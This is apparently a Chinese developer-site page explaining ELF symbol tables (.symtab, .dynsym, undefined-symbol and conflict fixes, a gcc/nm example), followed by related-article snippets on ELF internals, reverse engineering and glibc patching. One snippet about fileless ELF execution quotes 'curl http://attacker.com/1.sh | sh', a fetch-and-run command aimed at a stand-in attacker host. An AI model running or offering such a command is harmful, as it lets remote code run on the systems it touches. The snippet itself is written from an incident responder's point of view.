linux elf 符号表

ELF（Executable and Linkable Format）是Linux系统中常用的可执行文件、共享库和目标文件的格式。符号表（Symbol Table）是ELF文件中的一个重要组成部分，它包含了文件中定义的和引用的符号信息，如函数、变量等。

基础概念

符号（Symbol）：符号是程序中定义或引用的实体，如函数、全局变量等。
符号表（Symbol Table）：符号表是一个数据结构，存储了程序中所有符号的信息，包括符号名称、类型、大小、值以及在文件中的位置等。
ELF文件： ELF是一种用于二进制文件、可执行文件、共享库和核心转储格式文件的标准文件格式。

符号表的类型

.symtab：这是主要的符号表，包含了编译时所有的符号信息。
.dynsym：动态符号表，包含了运行时需要的符号信息，主要用于动态链接。
.debug：调试符号表，包含了额外的调试信息，通常用于调试器。

符号表的优势

动态链接：符号表使得不同的程序模块可以在运行时动态链接，提高了代码的复用性和灵活性。
调试支持：调试符号表提供了详细的符号信息，便于开发者进行调试。
版本控制：符号表可以用于版本控制，确保不同版本的库之间的兼容性。

应用场景

程序编译和链接：在编译和链接阶段，符号表用于解析函数和变量的引用。
动态加载库：在运行时，动态链接器使用符号表来加载和链接共享库。
调试工具：调试器通过读取符号表来显示变量值、函数调用栈等信息。

遇到的问题及解决方法

问题：找不到符号（undefined symbol）

原因：

链接时缺少相应的库。
符号名称拼写错误或不存在。

解决方法：

确保所有需要的库都已正确链接。
确保所有需要的库都已正确链接。
检查符号名称是否正确。
检查符号名称是否正确。

问题：符号冲突

原因：

不同库中存在同名符号。

解决方法：

使用-Bsymbolic选项强制链接器优先使用本地符号。
使用-Bsymbolic选项强制链接器优先使用本地符号。
重命名冲突的符号。

示例代码

假设我们有两个文件main.c和lib.c，并且我们想要链接它们。

main.c：

#include <stdio.h>

void print_hello();

int main() {
    print_hello();
    return 0;
}

lib.c：

#include <stdio.h>

void print_hello() {
    printf("Hello, World!\n");
}

编译并链接：

gcc -c lib.c -o lib.o
gcc -shared -o libmylib.so lib.o
gcc -o myprogram main.c -L. -lmylib

查看符号表：

nm libmylib.so

通过以上步骤，你可以看到符号表中包含了print_hello函数的信息。

希望这些信息对你有所帮助！如果有更多具体问题，欢迎继续咨询。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Linux ELF笔记

ELF头部的结构体为 elf32_hdr 或 elf64_hdr，在Android系统源代码的 /bionic/libc/kernel/uapi/linux/elf.h 可以找到。...ELFOSABI_HPUX 1 /* HP-UX */ #define ELFOSABI_NETBSD 2 /* NetBSD. */ #define ELFOSABI_LINUX...3 /* Linux. */ #define ELFOSABI_SOLARIS 6 /* Sun Solaris. */ #define ELFOSABI_AIX...ET_EXEC 指的是可执行程序，存在程序入口，有 Program Header，可以加载到内存中运行，在 Linux 下的可执行程序都是这样的。 ET_DYN 特指动态链接库。...作者的话个人喜欢计算机技术，主要涉及的领域包括：Android系统，Linux内核，嵌入式软/硬件，机器人和智能硬件。同时也对其他的各个技术栈都感兴趣。

2.1K1 0

linux内核符号表kallsyms简介

在2.6版的内核中，为了更方便的调试内核代码，开发者考虑将内核代码中所有函数以及所有非栈变量的地址抽取出来，形成是一个简单的数据块(data blob:符号和地...

2.7K2 0

【Android 逆向】ELF 文件格式 ( 程序头数据 | 节区头数据 | 动态符号表 )

文章目录一、程序头数据二、节区头数据三、动态符号表一、程序头数据 ---- 在上一篇博客【Android 逆向】ELF 文件格式 ( ELF 程序头入口大小 | ELF 程序头入口个数 | ELF...文件节区头入口大小 | ELF 文件节区头入口个数 | 字符表序号 ) 中 , 分析到该 ELF 文件的程序头有 7 个入口 , 每个入口大小 32 字节 ; 这 7 个程序头入口 , 分别有不同的作用...都有该区域 , 一些加固软件会抹掉该区域数据 , 导致解析 ELF 文件时无法找到后面的代码 , 符号等节区数据 , 在运行时在将该区域添加上去 ; .text : 代码数据 ; .plt :...引用的外部的库 ; .got : 全局符号表 , 包含导入导出数据 ; 重要的符号信息 ( 函数 , 全局变量 ) , 都在该数据区域中 ; .data : 数据段 ; .bss : BSS 段 ;....comment : 注释 ; .shstrtab : 字符串表 ; 由下图可以看出 , 节区头数据在 ELF 文件的末尾位置 ; 三、动态符号表 ---- 动态符号表示导入导出的符号数据

4811 0

Linux无文件渗透执行ELF

01 简介在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/...exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？...02 技术核心这里向大家介绍一个linux系统的底层调用函数memfd_create(2)，它在内核3.17中引入，会创建一个匿名文件并返回一个文件描述符指向它，该文件表现和常规文件类同，可以进行修改...这里还有一个问题，如何将elf二进制文件写入到创建的文件当中，@MagisterQuis这里使用open函数将$FH内容添加进创建的匿名文件$fd当中，而$FH通过perl转化自要执行的elf文件，这就是该脚本的第二部分...参考： https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html http://man7.org/linux

5.6K8 0

ARM Linux ELF加壳方案

5.6K3 0

遇到ELF: not found

Reference https://stackoverflow.com/questions/57446579/executable-says-line-1-elf-not-found-when-starts

3.8K1 0

几个命令了解ELF文件的”秘密“

来源：公众号【编程珠玑】作者：守望先生网站：https://www.yanbinghu.com 前言在Linux中，可执行文件的格式是ELF格式，而有一些命令可以帮助我们了解它们更多的“秘密”，以此来帮助我们解决问题..., not stripped 从结果中，我们可以知道，它是ELF可执行文件，且是64位程序，有动态链接，最后的not stripped也表明了它保留了符号表信息或者调试信息。...不如看看它链接了哪些库吧： $ ldd hello linux-vdso.so.1 => (0x00007ffd16386000) libc.so.6 => /lib/x86_64-linux-gnu...如何看看符号表里有没有吧（前提是符号表没有被去掉）： $ nm hello |grep main #符号表中查找main函数 U __libc_start_main@...为ELF文件瘦身前面通过file查看文件时，看到有not stripped的字样，由于它里面包含了一些符号表信息，因为文件会稍大，如果去掉，二进制文件将会变小，但是里面的符号表信息也就没有了，将会影响问题定位

2.4K2 0

【Android 逆向】ELF 文件格式 ( ELF 文件简介 | ELF 文件结构 )

文章目录一、ELF 文件简介二、ELF 文件结构一、ELF 文件简介 ---- ELF 文件是 Executable and Linkable Format ( 可执行和可链接格式 ) 的文件...| 编译器指示字 ) 博客 ; ELF 文件对应的 Linux 中的目标文件格式有 : 库文件 , 可执行文件 , 编译中间文件 ; 编译中间文件有 .a , .o , .s 文件 ; 库文件 ,..., 会遵循 ELF 文件格式的规范 ; ELF 文件格式最常见的形式就是 .so 动态库 ; ELF 文件的特点 : ELF 文件是以 7F 45 4C 46 开头 , 其中 7F 是一个二进制标志..., 45 4C 46 是 ELF 字符对应的 ASCII 码 ; 二、ELF 文件结构 ---- ELF 文件由以下四部分组成 : ELF 文件头 ELF 程序头 : ELF 程序头会告知节区头部表的位置...; 节区或段节区头部表 : 节区头部表会告知 ELF 文件中有多少个节区 , 一般节区头部表一般都在 ELF 文件尾部 ;

1.3K3 0

链接加载原理及ELF文件格式

在linux环境下，链接和加载的机制最终有一个载体来承担，这个载体就是elf文件。所以从研究elf文件格式入手，是理解链接和加载原理的好方法。...符号表(Symbol Table)：符号表就是一张字符符号和地址的对应表，例如使用“nm file“、”readelf -s file “等命令可以读出一个elf文件的符号表。...elf文件相关背景 Elf文件格式，是现有linux环境下最流行的可执行文件格式，在elf文件存储的信息之上，实现了相应的链接和加载特性。...elf文件格式 Linux环境下，三种类型的执行文件都可以使用elf格式来表示：可重定位文件（即编译生成但是未连接的文件）、动态库文件、可执行文件。...相关工具 Linux下可以操作elf文件的有以下工具： a.readelf “readelf –a file“读出elf文件的所有信息。 b.nm “nm file“读出elf文件的符号表信息。

1.2K2 0

【Android 逆向】ELF 文件格式 ( ELF 文件头 | ELF 文件头标志 | ELF 文件位数 | ELF 文件大小端格式 )

文章目录一、ELF 文件简介二、ELF 文件头三、ELF 文件头标志四、ELF 文件位数五、ELF 文件大小端格式一、ELF 文件简介 ---- 在上一篇博客【Android 逆向】ELF...文件格式 ( 安装 010 Editor 二进制查看工具的 ELF.bt 插件模板 | 安装 ELF.bt 模板 | 打开 ELF 文件 ) 中 , 准备 ELF 文件解析环境 , 在 010 Editor...中安装了 ELF.bt 模板 ; 二、ELF 文件头 ---- ELF 文件头区域如下 : 前 16 字节是 ELF 的标志 , 三、ELF 文件头标志 ---- 0 ~ 3 字节 : 是 0x7F...和 ELF 的 ASCII 码 ; 这是 ELF 文件的特征 ; 四、ELF 文件位数 ---- 4 字节 : 表示该 ELF 文件的位数 32 位还是 64 位 ; 值为 01 , 表示该 ELF...文件是 32 位文件 ; 五、ELF 文件大小端格式 ---- 5 字节 : 表示有效位格式 , 取值 LSB / MSB ; 此处值为 1 , LSB 格式 ; 这个值由编译器决定 ; 有些

1.1K1 0

elf文件解析器_elf文件下载

_Ehdr elf_head; int shnum, a; // 读取 head 到elf_head a = fread(&elf_head, sizeof(Elf64_Ehdr), 1, fp); if...(x) #define ELF32_ST_TYPE(x) ELF_ST_TYPE(x) #define ELF64_ST_BIND(x) ELF_ST_BIND(x) #define ELF64_ST_TYPE...elf32_note #define elf_shdr elf32_shdr #define elf_sym elf32_sym #define elf_addr_t Elf32_Off #ifdef...elfhdr elf64_hdr #define elf_phdr elf64_phdr #define elf_note elf64_note #define elf_shdr elf64_...shdr #define elf_sym elf64_sym #define elf_addr_t Elf64_Off #ifdef ELF_USES_RELOCA # define ELF_RELOC

1.6K2 0

Linux 修改 ELF 解决 glibc 兼容性问题

转自：Soul Of Free Loop链接：https://zohead.com/archives/mod-elf-glibc/ Linux glibc 问题相信有不少 Linux 用户都碰到过运行第三方...分析 ELF 首先用 readelf 命令查看 ELF 的符号表，由于该命令输出非常多，这里只贴出我们关心的信息： [root@centos6-dev ~]# readelf -sV tester Symbol...修改 ELF 符号表由于 Linux 系统中的 LD 库（也就是 /lib64/ld-linux-x86-64.so.2 库）加载 ELF 时检查 .gnu.version_r 表中的符号，我们可以使用任何一款十六进制编辑器来修改...文件的 .gnu.version_r 表（因为 patchelf 运行之后新 ELF 文件的符号表就和之前的不一样了），将 GLIBC_2.17 和 GLIBC_2.14 统一改为 GLIBC_2.2.5...符号，保存 ELF 文件之后就可以看到效果了： [root@centos6-dev ~]# ldd tester linux-vdso.so.1 => (0x00007fffc17ee000

5.3K2 0

elf 变异upx 脱壳

使用alt＋F7载入脚本，选择dump_elf64 等待加载成功以后，刚刚创建的dumpfile就是脱壳后的文件了。

1.5K2 0

1.7K2 0

ELF文件的加载过程(load_elf_binary函数详解)--Linux进程的管理与调度（十三）

因此，GNU把对于动态链接ELF映像的支持作了分工：把ELF映像的装入/启动入在Linux内核中；而把动态链接的实现放在用户空间（glibc），并为此提供一个称为”解释器”(ld-linux.so.2...Linux可执行文件类型的注册机制在说明ELF文件的加载过程以前，我们先回答一个问题，就是：为什么Linux可以运行ELF文件？.../binfmts.h中 linux支持其他不同格式的可执行程序, 在这种方式下, linux能运行其他操作系统所编译的程序, 如MS-DOS程序, 活BSD Unix的COFF可执行格式, 因此linux...而我们研究的ELF文件格式的linux_binfmt结构对象elf_format, 定义如下, 在/fs/binfmt.c中 static struct linux_binfmt elf_format...程序开始执行具体的信息可以参照 Intel平台下Linux中ELF文件动态链接的加载、解析及实例分析（一）: 加载 Intel平台下linux中ELF文件动态链接的加载、解析及实例分析（

8.4K5 1

通过修改第三方so的elf符号表兼容redhat6.2下低版本glibc

结论：通过16进制编辑器修改so的elf符号表来解决这个问题，即强制让so里依赖高版本gblic的函数指向低版本的glibc。.../libTaSESDK.so) linux-vdso.so.1 => (0x00007fff530a5000) libstdc++.so.6 => /usr/lib64....1 (0x00007fe729a24000) libc.so.6 => /lib64/libc.so.6 (0x00007fe729683000) /lib64/ld-linux-x86...0000003810efbd50 g iD .text 000000000000003c GLIBC_2.3.4 __memcpy_chk 接下来，要做的就是让so指向2.2.5版本修改elf...readelf -sV libTaSESDK.so >1.txt 通过readelf 命令查看so的ELF 的符号表定位到 .gnu.version_r ，其表示二进制程序实际依赖的库文件版本

1.4K2 0

ELF文件格式

文章目录源码到可执行文件 ELF文件格式 ELF File header Program header Section header 工具 Symbol Table 源码到可执行文件 linux中四类文件使用...https://man7.org/linux/man-pages/man5/elf.5.html 1999年86open项目选择ELF作为x86处理器上Unix和类Unix系统的标准二进制文件格式。...“.strtab”段含有表示符号表(symbol table)名字的字符串。 “.symtab”段含有文件的符号表，在后文专门介绍。 “.text”段包含程序的可执行指令。...符号表入口结构定义如下，可在/usr/include/elf.h中可以找到文件头结构定义： typedef struct elf64_sym { Elf64_Word st_name; /* Symbol..._Xword st_size; /* Associated symbol size */ } Elf64_Sym; st_name包含指向符号表字符串表(strtab)中的索引，从而可以获得符号名。

1.6K3 0

重学计算机组成原理（七）- 程序无法同时在Linux和Windows下运行？

符号表保留了我们所说的当前文件里面定义的函数名称和对应地址的地址簿。链接器会扫描所有输入的目标文件，然后把所有符号表里的信息收集起来，构成一个全局的符号表。...我们今天讲的是Linux下的ELF文件格式，而Windows的可执行文件格式是一种叫作PE（Portable Executable Format）的文件格式。...Linux下的装载器只能解析ELF格式而不能解析PE格式。如果我们有一个可以能够解析PE格式的装载器，我们就有可能在Linux下运行Windows程序了。这样的程序真的存在吗？...而现在微软的Windows里面也提供了WSL，也就是Windows Subsystem for Linux，可以解析和加载ELF格式的文件。...对于ELF格式的文件，为了能够实现这样一个静态链接的机制，里面不只是简单罗列了程序所需要执行的指令，还会包括链接所需要的重定位表和符号表。

1.4K6 0

ELF格式及其常用的几个函数

ELF 简介 ELF（Executable and Linkable Format）是一种可执行文件和可链接文件的标准格式，用于在Linux和Unix系统中存储程序和库文件。...它是一种二进制文件格式，包含程序的代码、数据、符号表、段表等信息。 ELF格式的文件由多个段（section）组成，每个段包含不同类型的信息，如代码段、数据段、符号表段等。...ELF格式的文件具有较好的可移植性和灵活性，可以在不同的操作系统和硬件平台上运行。它也支持动态链接和共享库，使得程序可以在运行时动态加载和链接库文件，提高了程序的灵活性和效率。...2 nm nm主要用于查看elf中的符号。 3 strip 用于删除elf文件中的符号信息和调试信息，用来减小elf文件的大小。 4 strings 用于查看elf文件中的字符串信息。...5 readelf 查看elf文件信息，功能强大。 6 objdump 另一个查看elf文件的工具。

2361 0

解决linux安装软件：libld-linux.so.2: bad ELF interpreter问题

问题一，64位系统中安装了32位程序解决办法是因为64位系统中安装了32位程序解决方法： yum install glibc.i686 问题二，解决交叉编译环境错误 # arm-linux-gcc...hello.c -o tt /home/gl/usr/local/arm/4.3.2/bin/arm-linux-gcc: /home/gl/usr/local/arm/4.3.2/bin/arm-none-linux-gnueabi-gcc...: /lib/ld-linux.so.2: bad ELF interpreter: 没有那个文件或目录 /home/gl/usr/local/arm/4.3.2/bin/arm-linux-gcc...:行3: /home/gl/usr/local/arm/4.3.2/bin/arm-none-linux-gnueabi-gcc: 成功 [root@austgl gl]# yum install ld-linux.so

13.5K19 18

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

linux elf 符号表

基础概念

符号表的类型

符号表的优势

应用场景

遇到的问题及解决方法

问题：找不到符号（undefined symbol）

问题：符号冲突

示例代码

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐